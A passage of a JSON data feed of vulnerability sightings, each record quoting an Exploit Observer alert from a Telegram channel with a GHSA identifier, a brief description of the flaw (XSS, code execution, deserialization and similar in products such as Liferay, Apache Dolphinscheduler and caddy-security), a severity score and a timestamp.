"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R25-68WM-JW35", "type": "seen", "source": "https://t.me/arpsyndicate/2915", "content": "#ExploitObserverAlert\n\nGHSA-8r25-68wm-jw35\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-8R25-68WM-JW35. Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings.\n\nGHSS: 7.1", "creation_timestamp": "2024-01-19T09:57:04.000000Z"}, {"uuid": "0000b7c5-421d-4461-a460-7782ff56bdd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-487G-3M3V-HJHQ", "type": "seen", "source": "https://t.me/arpsyndicate/3794", "content": "#ExploitObserverAlert\n\nGHSA-487g-3m3v-hjhq\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-487g-3m3v-hjhq. Uncontrolled Resource Consumption in moodle", "creation_timestamp": "2024-02-21T14:07:51.000000Z"}, {"uuid": "a5e1a0d6-c5d9-4b8a-a614-c65a325003d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R275-J57C-7MF2", "type": "seen", "source": "https://t.me/arpsyndicate/3770", "content": "#ExploitObserverAlert\n\nGHSA-r275-j57c-7mf2\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-r275-j57c-7mf2. Race condition in Endorsements", "creation_timestamp": "2024-02-21T13:32:47.000000Z"}, {"uuid": "57ddc981-0922-4b34-ac01-6e40c8470681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5H3X-9WVQ-W4M2", "type": "seen", "source": "https://t.me/arpsyndicate/2465", "content": "#ExploitObserverAlert\n\nGHSA-5h3x-9wvq-w4m2\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-5H3X-9WVQ-W4M2. By frontrunning the creation of a proposal, an attacker can become the proposer and gain the ability to cancel it. The attacker can do this repeatedly to try to prevent a proposal from being proposed at all.\n\nGHSS: 5.3", "creation_timestamp": "2024-01-04T13:40:32.000000Z"}, {"uuid": "1e8a0810-0ecd-4d88-b381-a5a323ffa137", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FWFG-VPRH-97PH", "type": "seen", "source": "https://t.me/arpsyndicate/2463", "content": "#ExploitObserverAlert\n\nGHSA-fwfg-vprh-97ph\n\nDESCRIPTION: Exploit Observer has 6 entries related to GHSA-FWFG-VPRH-97PH. OctoPrint versions up until and including 1.9.2 contain a vulnerability that allows malicious admins to configure a specially crafted GCODE script through the Settings that will allow code execution during rendering of that script.\n\nGHSS: 6.5", "creation_timestamp": "2024-01-04T13:31:33.000000Z"}, {"uuid": "e4bc5243-bbfe-47a6-ac9e-32f83d9b7424", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5H9G-X5RV-25WG", "type": "seen", "source": "https://t.me/arpsyndicate/2512", "content": "#ExploitObserverAlert\n\nGHSA-5h9g-x5rv-25wg\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-5H9G-X5RV-25WG. A cross-site scripting (XSS) vulnerability was discovered in the schema validation logic of the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or editor APIs. This malicious content could then end up in content published outside the editor, if no server-side sanitization was performed. This impacts all users who are using TinyMCE 5.8.2 or lower.\n\nGHSS: 6.1", "creation_timestamp": "2024-01-05T18:57:40.000000Z"}, {"uuid": "04045981-007a-4761-b401-8dc968b123e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4248-P65P-HCRM", "type": "seen", "source": "https://t.me/arpsyndicate/2511", "content": "#ExploitObserverAlert\n\nGHSA-4248-p65p-hcrm\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-4248-P65P-HCRM. CubeFS used an insecure random string generator to generate user-specific, sensitive keys used to authenticate users in a CubeFS deployment. This could allow an attacker to predict and/or guess the generated string and impersonate a user thereby obtaining higher privileges.\n\nGHSS: 6.5", "creation_timestamp": "2024-01-05T18:53:33.000000Z"}, {"uuid": "44c58479-49ec-493c-aaee-0f1b57446af5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M5XW-3JPH-CHXG", "type": "seen", "source": "https://t.me/arpsyndicate/2317", "content": "#ExploitObserverAlert\n\nGHSA-m5xw-3jph-chxg\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-M5XW-3JPH-CHXG. Transient DOS in Modem after RRC Setup message is received.\n\nGHSS: 7.5", "creation_timestamp": "2024-01-02T18:26:07.000000Z"}, {"uuid": "52b43448-127e-403f-afaf-e8eeaf3269e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P7Q7-P4XF-XRPF", "type": "seen", "source": "https://t.me/arpsyndicate/2316", "content": "#ExploitObserverAlert\n\nGHSA-p7q7-p4xf-xrpf\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-P7Q7-P4XF-XRPF. The IHwAttestationService interface has a defect in authentication. Successful exploitation of this vulnerability may affect data confidentiality.\n\nGHSS: 7.5", "creation_timestamp": "2024-01-02T04:33:53.000000Z"}, {"uuid": "b36450ab-8c9d-46f5-ab8a-3c72d6d2364e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3PX7-JM2P-6H2C", "type": "seen", "source": "https://t.me/arpsyndicate/2579", "content": "#ExploitObserverAlert\n\nGHSA-3px7-jm2p-6h2c\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-3PX7-JM2P-6H2C. The length of URIs and the various parts (eg path segments, query parameters) is usually limited by the webserver processing the incoming request. In the case of Puma the defaults are :\n\nGHSS: 7.5", "creation_timestamp": "2024-01-06T22:20:50.000000Z"}, {"uuid": "47be27f3-b231-4871-bdf1-0ac2ed478533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V2XQ-M22W-JMPR", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4031", "content": "#ExploitObserverAlert\n\nGHSA-v2xq-m22w-jmpr\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-v2xq-m22w-jmpr. Liferay Portal and Liferay DXP's Users Admin module vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T20:12:45.000000Z"}, {"uuid": "7d735a43-67a5-4fe0-babd-a018363bd642", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P6P2-QQ95-VQ5H", "type": "seen", "source": "https://t.me/arpsyndicate/2380", "content": "#ExploitObserverAlert\n\nGHSA-p6p2-qq95-vq5h\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-P6P2-QQ95-VQ5H. The Fides webserver API allows custom integrations to be uploaded as a ZIP file. This ZIP file must contain YAML files, but Fides can be configured to also accept the inclusion of custom Python code in it. The custom code is executed in a restricted, sandboxed environment, but the sandbox can be bypassed to execute any arbitrary code.\n\nGHSS: 8.8", "creation_timestamp": "2024-01-03T23:17:40.000000Z"}, {"uuid": "c34cc104-c4f2-434a-a76b-d1e196cab29f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GHJR-V93Q-VX27", "type": "seen", "source": "https://t.me/arpsyndicate/2250", "content": "#ExploitObserverAlert\n\nGHSA-ghjr-v93q-vx27\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-GHJR-V93Q-VX27. In Click Studios (SA) Pty Ltd Passwordstate 9435, users with access to a passwordlist can gain access to additional password lists without permissions. Specifically, an authenticated user who has write permissions to a password list in one folder (with the default permission model) can extend his permissions to all other password lists in the same folder.\n\nGHSS: 6.5", "creation_timestamp": "2023-12-29T12:34:44.000000Z"}, {"uuid": "4d051fcd-0375-4b60-b368-b9b277fedb35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WHJ9-M24X-QHHP", "type": "seen", "source": "https://t.me/arpsyndicate/2332", "content": "#ExploitObserverAlert\n\nGHSA-whj9-m24x-qhhp\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-WHJ9-M24X-QHHP. Before 2.6.3\n\nGHSS: 6.2", "creation_timestamp": "2024-01-03T17:28:06.000000Z"}, {"uuid": "a649e399-2a88-4e17-962c-ca0db92e8dcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X83F-9M8F-428Q", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3135", "content": "#ExploitObserverAlert\n\nGHSA-x83f-9m8f-428q\n\nDESCRIPTION: Exploit Observer has 6 entries in 2 file formats related to GHSA-x83f-9m8f-428q. Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)", "creation_timestamp": "2024-01-28T00:40:43.000000Z"}, {"uuid": "ffd0c88d-1454-4f7b-a256-a52cd533f3e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GGW5-HFXP-7276", "type": "seen", "source": "https://t.me/arpsyndicate/3132", "content": "#ExploitObserverAlert\n\nGHSA-ggw5-hfxp-7276\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-ggw5-hfxp-7276. Cross-Site Scripting in FireEye Malware Analysis (AX) affecting version 9.0.3.936530. This vulnerability allows an attacker to send a specially crafted JavaScript payload in the application URL to retrieve the session details of a legitimate user.", "creation_timestamp": "2024-01-28T00:29:54.000000Z"}, {"uuid": "ceed1718-0fa5-4f4a-8e0d-442f568f098b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RXJ5-22XC-HCCM", "type": "seen", "source": "https://t.me/arpsyndicate/3131", "content": "#ExploitObserverAlert\n\nGHSA-rxj5-22xc-hccm\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-rxj5-22xc-hccm. A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699.", "creation_timestamp": "2024-01-28T00:28:06.000000Z"}, {"uuid": "f6a0bfaf-0a0d-4c73-b2a0-cc395cdf53b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HG94-7RM8-6VF7", "type": "seen", "source": "https://t.me/arpsyndicate/3130", "content": "#ExploitObserverAlert\n\nGHSA-hg94-7rm8-6vf7\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-hg94-7rm8-6vf7. Libde265 1.0.9 has a heap buffer overflow vulnerability in de265_image::set_SliceAddrRS(int, int, int)", "creation_timestamp": "2024-01-28T00:23:55.000000Z"}, {"uuid": "06212323-53d6-41c7-8fac-729f6116d2f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9W99-78RJ-HMXQ", "type": "seen", "source": "https://t.me/arpsyndicate/3832", "content": "#ExploitObserverAlert\n\nGHSA-9w99-78rj-hmxq\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-9w99-78rj-hmxq. Cross-site scripting (XSS) in the dynamic file uploads", "creation_timestamp": "2024-02-21T15:11:03.000000Z"}, {"uuid": "bf7ff1f1-d208-40d4-93d3-ea394abb0721", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R969-783F-6JQR", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3831", "content": "#ExploitObserverAlert\n\nGHSA-r969-783f-6jqr\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-r969-783f-6jqr. Improper Neutralization of HTTP Headers in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T15:09:29.000000Z"}, {"uuid": "9be6fb20-440a-4c87-8cbb-cb898f7453c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7F2V-5877-RX3X", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3830", "content": "#ExploitObserverAlert\n\nGHSA-7f2v-5877-rx3x\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-7f2v-5877-rx3x. Code injection in REDAXO", "creation_timestamp": "2024-02-21T15:08:31.000000Z"}, {"uuid": "ed6831f9-9b0d-4889-b6ab-44131ec720c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-468X-FRCM-GHX6", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4037", "content": "#ExploitObserverAlert\n\nGHSA-468x-frcm-ghx6\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-468x-frcm-ghx6. Liferay Portal and Liferay DXP vulnerable to reflected Cross-site Scripting", "creation_timestamp": "2024-02-22T20:36:01.000000Z"}, {"uuid": "424af575-8aa4-4f9a-bd36-3421dfa4c33b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF2W-WM48-JHQJ", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3858", "content": "#ExploitObserverAlert\n\nGHSA-ff2w-wm48-jhqj\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-ff2w-wm48-jhqj. Arbitrary File Read Vulnerability in Apache Dolphinscheduler", "creation_timestamp": "2024-02-21T21:08:16.000000Z"}, {"uuid": "23fe6e00-352b-449b-814e-2b3c32d1cae3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3W6-26F2-P474", "type": "seen", "source": "https://t.me/arpsyndicate/3857", "content": "#ExploitObserverAlert\n\nGHSA-w3w6-26f2-p474\n\nDESCRIPTION: Exploit Observer has 4 entries in 4 file formats related to GHSA-w3w6-26f2-p474. Broken Access Control in Spring Security With Direct Use of isFullyAuthenticated", "creation_timestamp": "2024-02-21T21:07:06.000000Z"}, {"uuid": "bf0473a5-4e0d-4a0e-9c32-c305b01dfc18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G9R-VXHX-9PGX", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3855", "content": "#ExploitObserverAlert\n\nGHSA-4g9r-vxhx-9pgx\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-4g9r-vxhx-9pgx. Apache Commons Compress: Denial of service caused by an infinite loop for a corrupted DUMP file", "creation_timestamp": "2024-02-21T15:41:35.000000Z"}, {"uuid": "31850291-5daf-471b-8461-a624882297ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73X3-8MRG-5R93", "type": "seen", "source": "https://t.me/arpsyndicate/4051", "content": "#ExploitObserverAlert\n\nGHSA-73x3-8mrg-5r93\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-73x3-8mrg-5r93. Liferay Portal Language Override edit screen and Liferay DXP vulnerable to reflected Cross-site Scripting", "creation_timestamp": "2024-02-22T21:12:40.000000Z"}, {"uuid": "3d3b4768-2cb9-4c9d-9419-2201d94f526f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H95-JCP5-PJPR", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3853", "content": "#ExploitObserverAlert\n\nGHSA-8h95-jcp5-pjpr\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-8h95-jcp5-pjpr. Improper Validation of Array Index in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T15:39:11.000000Z"}, {"uuid": "d625ee87-c768-4186-a85d-86a167b1e0bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4J93-FM92-RP4M", "type": "seen", "source": "https://t.me/arpsyndicate/3876", "content": "#ExploitObserverAlert\n\nGHSA-4j93-fm92-rp4m\n\nDESCRIPTION: Exploit Observer has 1 entries in 1 file formats related to GHSA-4j93-fm92-rp4m. ASA-2024-003: Missing `BlockedAddressed` Validation in Vesting Module", "creation_timestamp": "2024-02-21T21:32:59.000000Z"}, {"uuid": "f813ee4e-b692-4d21-9f41-3ac5a4cd606c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2557-X9MG-76W8", "type": "seen", "source": "https://t.me/arpsyndicate/3875", "content": "#ExploitObserverAlert\n\nGHSA-2557-x9mg-76w8\n\nDESCRIPTION: Exploit Observer has 1 entries in 1 file formats related to GHSA-2557-x9mg-76w8. ASA-2024-002: Default `PrepareProposalHandler` may produce invalid proposals when used with default `SenderNonceMempool`", "creation_timestamp": "2024-02-21T21:31:33.000000Z"}, {"uuid": "918a94ae-261b-4cb7-8830-f6acd0c3e270", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VGV8-5CPJ-QJ2F", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3958", "content": "#ExploitObserverAlert\n\nGHSA-vgv8-5cpj-qj2f\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-vgv8-5cpj-qj2f. pymatgen vulnerable to arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string", "creation_timestamp": "2024-02-22T09:59:37.000000Z"}, {"uuid": "c87e59d9-60d4-4ec9-be75-68b3ad8972bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3QR-QR4X-J273", "type": "seen", "source": "https://t.me/arpsyndicate/3954", "content": "#ExploitObserverAlert\n\nGHSA-f3qr-qr4x-j273\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-f3qr-qr4x-j273. php-svg-lib lacks path validation on font through SVG inline styles", "creation_timestamp": "2024-02-22T09:54:29.000000Z"}, {"uuid": "20c7dd87-db21-4a65-96f9-cef0d749c767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8HP3-RMR7-XH88", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3834", "content": "#ExploitObserverAlert\n\nGHSA-8hp3-rmr7-xh88\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-8hp3-rmr7-xh88. Open Redirect in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T15:13:17.000000Z"}, {"uuid": "2912a217-a7bf-4dd5-956e-dfa5068c0484", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36XR-4X2F-CFJ9", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3874", "content": "#ExploitObserverAlert\n\nGHSA-36xr-4x2f-cfj9\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-36xr-4x2f-cfj9. Deserialization of Untrusted Data in Apache Camel SQL", "creation_timestamp": "2024-02-21T21:28:44.000000Z"}, {"uuid": "db28c649-f75b-45a4-9c1f-d349253afa6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RW2-3HHP-RC46", "type": "seen", "source": "https://t.me/arpsyndicate/3872", "content": "#ExploitObserverAlert\n\nGHSA-7rw2-3hhp-rc46\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-7rw2-3hhp-rc46. Cross-site Scripting Vulnerability in Statement Browser", "creation_timestamp": "2024-02-21T21:26:33.000000Z"}, {"uuid": "1fa843a8-3628-4787-9bc2-d510cf4c8aca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-375G-39JQ-VQ7M", "type": "seen", "source": "https://t.me/arpsyndicate/3871", "content": "#ExploitObserverAlert\n\nGHSA-375g-39jq-vq7m\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-375g-39jq-vq7m. Potential buffer overflow in CBOR2 decoder", "creation_timestamp": "2024-02-21T21:24:56.000000Z"}, {"uuid": "c51d0b97-d0a4-4e00-887d-035e100b6efa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37GX-JQX9-FWMG", "type": "seen", "source": "https://t.me/arpsyndicate/3870", "content": "#ExploitObserverAlert\n\nGHSA-37gx-jqx9-fwmg\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-37gx-jqx9-fwmg. Improper Certificate Validation in Apache DolphinScheduler", "creation_timestamp": "2024-02-21T21:23:31.000000Z"}, {"uuid": "d8bed172-4e65-44ad-837e-3e573ee934c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3QM-VFC3-JG6V", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3807", "content": "#ExploitObserverAlert\n\nGHSA-f3qm-vfc3-jg6v\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-f3qm-vfc3-jg6v. Possible CSRF attack at questionnaire templates preview", "creation_timestamp": "2024-02-21T14:28:56.000000Z"}, {"uuid": "a78b5bae-2c09-48f6-925e-c07a9c246de7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M43P-55RF-8C2J", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3867", "content": "#ExploitObserverAlert\n\nGHSA-m43p-55rf-8c2j\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-m43p-55rf-8c2j. Deserialization of Untrusted Data in Apache Camel CassandraQL", "creation_timestamp": "2024-02-21T21:19:32.000000Z"}, {"uuid": "9f3197b7-6c73-4263-8384-0f3b5b4a16d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3JCV-5F9P-2F2P", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3866", "content": "#ExploitObserverAlert\n\nGHSA-3jcv-5f9p-2f2p\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-3jcv-5f9p-2f2p. Cross-site Scripting in electron-pdf", "creation_timestamp": "2024-02-21T21:18:02.000000Z"}, {"uuid": "b4a3ff1b-4b20-450d-b82e-2812876d249b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RWM-2XW8-HH9P", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3865", "content": "#ExploitObserverAlert\n\nGHSA-5rwm-2xw8-hh9p\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-5rwm-2xw8-hh9p. Deserialization of Untrusted Data in Torrentpier", "creation_timestamp": "2024-02-21T21:17:09.000000Z"}, {"uuid": "108b2aa4-f3a6-4e26-ba95-a132b098d0de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P3RV-QJ56-2FQX", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3864", "content": "#ExploitObserverAlert\n\nGHSA-p3rv-qj56-2fqx\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-p3rv-qj56-2fqx. Cross-site Scripting in Pyhtml2pdf", "creation_timestamp": "2024-02-21T21:15:50.000000Z"}, {"uuid": "14f80c56-c8cb-43b4-ac88-3047e53de237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ36-3CCR-6563", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3841", "content": "#ExploitObserverAlert\n\nGHSA-vj36-3ccr-6563\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-vj36-3ccr-6563. Authentication Bypass by Spoofing in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T15:22:23.000000Z"}, {"uuid": "63ce7e58-494f-45a0-b9a7-86da5d5e6939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q847-2Q57-WMR3", "type": "seen", "source": "https://t.me/arpsyndicate/315", "content": "#ExploitObserverAlert\n\nGHSA-q847-2q57-wmr3\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-Q847-2Q57-WMR3.\n\nGHSS: 6.1", "creation_timestamp": "2023-11-21T14:36:25.000000Z"}, {"uuid": "2a37ecc4-cf71-4e9a-9b3b-eabb4bb43964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9VV-FHGV-CJC3", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3861", "content": "#ExploitObserverAlert\n\nGHSA-c9vv-fhgv-cjc3\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-c9vv-fhgv-cjc3. agent-js: Insecure Key Generation in `Ed25519KeyIdentity.generate`", "creation_timestamp": "2024-02-21T21:12:12.000000Z"}, {"uuid": "49bbc2d7-48c4-4d6b-ad79-832ddfda768a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CP68-QRHR-G9H8", "type": "seen", "source": "https://t.me/arpsyndicate/3859", "content": "#ExploitObserverAlert\n\nGHSA-cp68-qrhr-g9h8\n\nDESCRIPTION: Exploit Observer has 1 entries in 1 file formats related to GHSA-cp68-qrhr-g9h8. MeshCentral cross-site websocket hijacking (CSWSH) vulnerability", "creation_timestamp": "2024-02-21T21:09:54.000000Z"}, {"uuid": "cc3801f0-cb98-4448-a0fb-c5e042fab744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QWXX-XWW6-8Q8M", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3860", "content": "#ExploitObserverAlert\n\nGHSA-qwxx-xww6-8q8m\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-qwxx-xww6-8q8m. Remote Code Execution in Apache Dolphinscheduler", "creation_timestamp": "2024-02-21T21:11:07.000000Z"}, {"uuid": "c05eb712-bd33-4231-83e0-475e3967a556", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 